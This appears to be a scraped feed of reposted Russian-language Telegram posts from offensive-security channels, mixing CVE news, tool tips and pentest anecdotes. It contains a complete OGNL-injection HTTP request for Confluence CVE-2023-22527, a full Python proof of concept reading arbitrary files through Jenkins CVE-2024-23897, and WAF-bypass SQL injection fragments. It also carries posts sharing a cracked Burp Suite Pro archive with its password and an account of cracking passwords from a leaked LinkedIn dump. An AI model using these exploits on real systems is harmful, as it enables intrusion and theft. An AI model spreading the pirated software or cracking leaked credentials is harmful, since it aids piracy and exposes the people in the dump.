Forwarded from RedTeam brazzers (Pavel Shlundin)
Недавно на пентесте столкнулся с ситуацией, когда надо поспреить пользователей, а на руках есть вывод Ldapdomaindump. Вроде кажется, что задача простая, но есть нюансы:
1. В домене около 30к пользователей;
2. Большинство пользователей отключены, т.к. уволенных сотрудников не удаляют из домена;
3. В группе Protected Users около 600 пользователей (да, бывает и такое);
4. 8к пользователей используют smart-cards им пароли нет смысла спреить;
5. И самое жёсткое - это наличие большого количества сервисных учетных записей, к которым применяется FGPP (гранулированная парольная политика), которая при вводе хотя бы 1 неправильного пароля - блокирует учетную запись (Немного спорное решение, пишите в комментарии как к нему относитесь).
Таким образом, если заранее не подготовить список пользователей, то как минимум можно нарваться на долгий спрей по 30к пользователям, а как максимум залочить все сервисные учетные записи, которые не используют GMSA.
Под этот проект я накидал небольшой скрипт на питоне, который позволил отсеять 70% учетных записей и сократить список пользователей для спрея до 7800. После этого спрей дал результаты. В приложении скрипт (прошу не судить строго).
1. В домене около 30к пользователей;
2. Большинство пользователей отключены, т.к. уволенных сотрудников не удаляют из домена;
3. В группе Protected Users около 600 пользователей (да, бывает и такое);
4. 8к пользователей используют smart-cards им пароли нет смысла спреить;
5. И самое жёсткое - это наличие большого количества сервисных учетных записей, к которым применяется FGPP (гранулированная парольная политика), которая при вводе хотя бы 1 неправильного пароля - блокирует учетную запись (Немного спорное решение, пишите в комментарии как к нему относитесь).
Таким образом, если заранее не подготовить список пользователей, то как минимум можно нарваться на долгий спрей по 30к пользователям, а как максимум залочить все сервисные учетные записи, которые не используют GMSA.
Под этот проект я накидал небольшой скрипт на питоне, который позволил отсеять 70% учетных записей и сократить список пользователей для спрея до 7800. После этого спрей дал результаты. В приложении скрипт (прошу не судить строго).
Docs
Advanced AD DS Management Using Active Directory Administrative Center (Level 200)
Learn more about Advanced AD DS Management using Active Directory Administrative Center (Level 200).
Forwarded from RedTeam brazzers (Pavel Shlundin)
parse_domain_users
1.1 KB
Forwarded from Интернет-Розыск
Список бесплатных ChatGPT-ботов для программирования
▫️https://www.blackbox.ai/
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
▫️https://www.blackbox.ai/
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
🤝2
Forwarded from PurpleBear (Vadim Shelest)
Детали уязвимости CVE-2023-22527 (оценка по CVSS3.0=10), позволяющей получить RCE в
Согласно даннымскомпрометированных торчащих в интернет серверов
⚙️POC: https://github.com/VNCERT-CC/CVE-2023-22527-confluence
🪲Уязвимые версии ПО: 8.0.x - 8.5.3
✅ Рекомендации: Патч уже доступен, необходимо ASAP обновиться до версии 8.5.3
#confluence #CVE-2023-22527
Atlassian Confluence известны уже пару дней, но не все почему-то спешат обновлять свои сервера. 🤷♂️Согласно данным
Censys, которые обновляются ежедневно в отношении всего пространства IPv4, в нашей стране на сегодняшний день~3.6k Confluence. Технические детали уязвимости опубликованы в блоге ProjectDiscovery, эксплуатация позволяет не аутентифицированному злоумышленнику получить возможность исполнения произвольного кода путем SSTI инъекции OGNL (Object-Graph Navigation Language)POST /template/aui/text-inline.vm HTTP/1.1
Host: сonfluence:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
⚙️POC: https://github.com/VNCERT-CC/CVE-2023-22527-confluence
🪲Уязвимые версии ПО: 8.0.x - 8.5.3
✅ Рекомендации: Патч уже доступен, необходимо ASAP обновиться до версии 8.5.3
#confluence #CVE-2023-22527
ProjectDiscovery
Atlassian Confluence - Remote Code Execution (CVE-2023-22527) — ProjectDiscovery Blog
CVE-2023-22527 is a critical vulnerability within Atlassian's Confluence Server and Data Center. This vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution…
❤1
Forwarded from burpsuite (not official)
burpsuite_pro_v2023.12.1.2.zip
686 MB
pass: 311138
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.7.0
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.7.0
❤1
Forwarded from The Hacker News
🚨 Urgent: Critical Jenkins RCE vulnerability (CVE-2024-23897) discovered.
Hackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds.
Details here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
Hackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds.
Details here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
🫡2❤1
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
Использование:
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1
Forwarded from SHADOW:Group
💉 Про обход защиты от SQL-инъекций
Часто WAF на сайте душит все попытки провести SQL-инъекцию и не даетнормально воткнуть кавычку и вставить привычный пэйлоад, однако, нехитрыми манипуляциями все же частенько его можно обойти.
Например, добавив управляющие символы , типа
Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.
#web #sqli #bypass #waf
Часто WAF на сайте душит все попытки провести SQL-инъекцию и не дает
Например, добавив управляющие символы , типа
%00, %0A и др. или вставив математические операции ('AND'1'=1*1 вместо 'AND'1'='1') или добавив специфичные комментарии типа /*!50000%55nIoN*/ /*!50000%53eLeCt*/ и многое другое.Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.
#web #sqli #bypass #waf
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Web tools, или с чего начать пентестеру?
https://habr.com/ru/companies/dsec/articles/452836/
https://habr.com/ru/companies/dsec/articles/452836/
Forwarded from PWN AI
Машинно-генерируемый код .. его так много и все мы с вами понимаем что он небезопасен.
Но можно ли заставить машину искать небезопасный код?
И вы можете сказать - мол "вставлю в гпт, попрошу - 'перепиши безопасно' " - но к сожалению так не заработает ...
В этом посте, я хочу с вами поделиться инструментом, который использует машинное обучение и помогает прогнозировать и обнаруживать уязвимости в коде (написанном или который пишется) на крестах(c++) .. да-да если есть такое для питона, то пришлите в комментариях.
В общем, AIBughunter - это дополнение, которое может быть интегрировано в vscode. Обучали его на данных из NVD.
В чём его плюсы для плюсов:
Последний коммит расширения произошёл в прошлом году, однако разработчики не забросили проект - даже недавно написали paper по нему.
[демо-видос]
#аппсековое #code
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Так, ADCS ESC13
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
P.S. А 12 тоже мимо вас прошел😅
#ad #adcs #pentest #redteam
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
P.S. А 12 тоже мимо вас прошел😅
#ad #adcs #pentest #redteam
SpecterOps
ADCS ESC13 Abuse Technique - SpecterOps
How to defend against ADCS abuse: ESC13 and beyond. Learn how attackers exploit Active Directory Certificate Services to escalate privileges.
Forwarded from SecuriXy.kz
Теперь можно извлекать учетные данные без обращения к диску (Dumping credentials without touching disk) с помощью утилиты #go-secdump которая поддерживает и SOCKS Proxy решая проблему #Impacket
https://github.com/jfjallid/go-secdump
скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
https://github.com/jfjallid/go-secdump
скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
Forwarded from Cult Of Wire
Для проверки Docker-образов на уязвимости есть хороший инструмент - Trivy. Сам использую и другим советую. Но сейчас не про него. Trivy хоть и хороший инструмент, но покрывает только поиск уязвимостей.
Trivy неплохо дополняет другой инструмент - Dockle.
Dockle это security linter, который проверяет Dockerfile на уязвимости (Dockle Checkpoints for Docker и Dockle Checkpoints for Linux), помимо этого проверяет и на соответствие Dockerfile Best practices и рекомендациям CIS Docker Benchmarks.
В использовании Dockle довольно прост, так как это одиночный бинарник. Так же есть пакеты для установки под популярные системы.
Можно запустить и в Docker без установки:
Или так:
Кроме того есть возможность вывод отчёта в json файл c помощью
В контейнере можно сделать так:
Dockle легко интегриуется в CI/CD и с DefectDojo.
Из незначительных минусов могу отметить то, что Dockle не умеет сканировать Dockerfile, но для этого есть hadolint, хоть он и менее информативен.
Trivy неплохо дополняет другой инструмент - Dockle.
Dockle это security linter, который проверяет Dockerfile на уязвимости (Dockle Checkpoints for Docker и Dockle Checkpoints for Linux), помимо этого проверяет и на соответствие Dockerfile Best practices и рекомендациям CIS Docker Benchmarks.
В использовании Dockle довольно прост, так как это одиночный бинарник. Так же есть пакеты для установки под популярные системы.
Можно запустить и в Docker без установки:
VERSION=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
) && docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
goodwithtech/dockle:v${VERSION} goodwithtech/dockle-test:v2
Или так:
export DOCKLE_LATEST=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
)
docker run --rm goodwithtech/dockle:v${DOCKLE_LATEST} goodwithtech/dockle-test:v2Кроме того есть возможность вывод отчёта в json файл c помощью
-f json -o report_name.json:dockle -f json -o dockle_report.json goodwithtech/dockle-test:v2
В контейнере можно сделать так:
VERSION=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
) && docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
goodwithtech/dockle:v${VERSION} -f json goodwithtech/dockle-test:v2 > dockle_report.json
Dockle легко интегриуется в CI/CD и с DefectDojo.
Из незначительных минусов могу отметить то, что Dockle не умеет сканировать Dockerfile, но для этого есть hadolint, хоть он и менее информативен.
GitHub
GitHub - goodwithtech/dockle: Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start
Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start - goodwithtech/dockle
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-21413: Microsoft Outlook Leak Hash
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
Forwarded from AP Security
#poc #cve #exploit
Microsoft Outlook RCE: PoC🤖
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019
Proof Of Concept
Microsoft Outlook RCE: PoC
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019
Proof Of Concept
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
💘1
Forwarded from burpsuite (not official)
burpsuite_pro_v2024.1.1.1.zip
692.3 MB
pass: 311138
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.8.0
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.8.0
👨💻2
Forwarded from Кавычка (Bo0oM)
Быстро и дешево брутим хэши
Короч, есть чуваки такие, immers.cloud
По сути это хостинг с арендой видеокарт. А так как я занимался проектом passleak.ru, иногда нужно было разгадывать хэшики, решил не покупать под это оборудование. Вышло круто.
Тут есть два варианта развития событий.
Арендуем видеокарту (какую - по желанию, они там выкатили какие-то ультра-модные H100, но мне и 2080 часто хватает), грузим туда наши хэши, делаем что-то типа:
Устанавливаем hashcat и играемся с этим всем.
Но если нам нужно побрутить пароли по словарям, способ еще круче. Берем готовый образ Ubuntu + Hashcat + Weakpass 3, на диске будет лежать архив с Weakpass V3. Запускаем и прогоняем хэши, забираем то что сбрутилось, вырубаем машину.
Например, чтоб раскукожить пароли из дампа Linkedin - мне потребовалось рублей... 20?
В общем, круто держать под рукой чтобы быстро сбрутить какой-то хэшик.
>
Короч, есть чуваки такие, immers.cloud
По сути это хостинг с арендой видеокарт. А так как я занимался проектом passleak.ru, иногда нужно было разгадывать хэшики, решил не покупать под это оборудование. Вышло круто.
Тут есть два варианта развития событий.
Арендуем видеокарту (какую - по желанию, они там выкатили какие-то ультра-модные H100, но мне и 2080 часто хватает), грузим туда наши хэши, делаем что-то типа:
sudo apt-get update
sudo apt-get install gcc make tmux git mesa-common-dev cmake nvidia-cuda-toolkit build-essential unzip -y
https://ru.download.nvidia.com/XFree86/Linux-x86_64/470.63.01/NVIDIA-Linux-x86_64-470.63.01.run
chmod +x NVIDIA-Linux-x86_64-470.63.01.run
sudo ./NVIDIA-Linux-x86_64-470.63.01.run
Устанавливаем hashcat и играемся с этим всем.
Но если нам нужно побрутить пароли по словарям, способ еще круче. Берем готовый образ Ubuntu + Hashcat + Weakpass 3, на диске будет лежать архив с Weakpass V3. Запускаем и прогоняем хэши, забираем то что сбрутилось, вырубаем машину.
Например, чтоб раскукожить пароли из дампа Linkedin - мне потребовалось рублей... 20?
В общем, круто держать под рукой чтобы быстро сбрутить какой-то хэшик.
>
👨💻2
